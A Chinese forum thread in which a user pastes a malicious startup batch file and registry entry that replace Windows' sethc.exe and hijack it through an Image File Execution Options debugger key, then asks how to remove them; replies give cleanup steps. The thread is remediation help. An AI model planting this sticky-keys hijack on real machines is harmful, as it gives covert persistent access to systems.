FH.bat
@echo off
attrib -s -a -h -r %systemroot%\system32\sethc.exe
attrib -s -a -h -r %systemroot%\system32\dllcache\sethc.exe
copy /y sethc.exe %systemroot%\system32\dllcache\sethc.exe
copy /y sethc.exe %systemroot%\system32\sethc.exe
regedit /s set.reg
regedit /s set.reg
exit
set.reg文件代码
Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\WINDOWS\\system32\\set.exe"
然后windows启动向里面有自动启动FH.bat这个批处理文件。
我知道这是恶意的程序。但是怎么才能彻底的清除呢。就简单的删除启动项和源文件吗?
好像系统文件被替换了,怎么才能还原!
附上恶意软件的目录截图。
没有具体样本,无法明确信息。
建议移除方法:
1. 杀软扫描:
C:\WINDOWS\system32\sethc.exe
C:\WINDOWS\system32\set.exe
并删除添加的注册表项(这个不会造成什么影响);
2. 删除 set.exe(建议备份);
删除注册表项,利用相同系统的 sethc.exe 覆盖本机的两个文件;
关键是注册表那项,删除不让启动,批处理就用来隐藏启动它的。
删除这些文件和启动项,用360.